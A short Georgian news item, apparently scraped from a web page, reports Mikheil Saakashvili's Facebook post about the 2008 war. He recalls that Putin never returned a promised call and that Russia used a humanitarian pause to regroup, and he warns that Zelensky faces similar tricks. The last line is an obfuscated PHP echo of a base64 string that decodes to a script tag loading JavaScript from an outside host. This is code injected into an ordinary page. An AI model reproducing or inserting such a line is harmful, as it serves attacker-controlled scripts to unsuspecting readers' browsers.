celsiusi
ავერსი საქკაბელი
საქართველოს მესამე პრეზიდენტი, მიხეილ სააკაშვილი 2008 წლის ომის პერიოდის ეპიზოდს იხსენებს, რომელიც რუსეთის პრეზიდენტთან ვლადიმე პუტინთან კომუნიკაციას ეხება. ამის შესახებ სააკაშვილის ფეისბუქ გვერდზე, ცოტა ხნის წინ განთავსებულ პოსტში წერია. 
 
სააკაშვილის თქმით, 2008 წელს, 9 აგვისტოს, ომის დაწყებიდან მესამე დღეს, გაეროში  მაშინდელ ელჩთან, ირაკლი ალასანიასთან მივიდა რუსეთის ელჩი ჩურკინი და უთხრა, რომ პუტინი სასაუბროდ მზად იყო.
 
"ირაკლიმ ეგრევე შემატყობინა. მე ეგრევე შევუკვეთე ჩვენს კომუნიკატორს კრემლში დარეკვა. გვითხრეს, რომ ვლადიმერ ვლადიმეროვიჩი დაკავებულია და 1-2 საათში გადმორეკავდა. მის ზარს დღემდე ველოდები. 
 
იყო მეორე ეპიზოდიც - რუსების წინადადება მივიღეთ ჰუმანიტარულ პაუზაზე, რათა დაღუპულები და დაჭრილები გაგვეცვალა. მათ ეს გამოიყენეს ძალების მათთვის ბევრად უფრო მომგებიანი გაშლისა და გადაჯგუფებისთვის. 
 
ამას იმიტომ ვყვები, რომ ახლა მუდმივად შეეცდებიან, ზელენსკისაც მსგავსი ტრიუკები ჩაუტარონ." – წერს სააკაშვილი. 
877
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");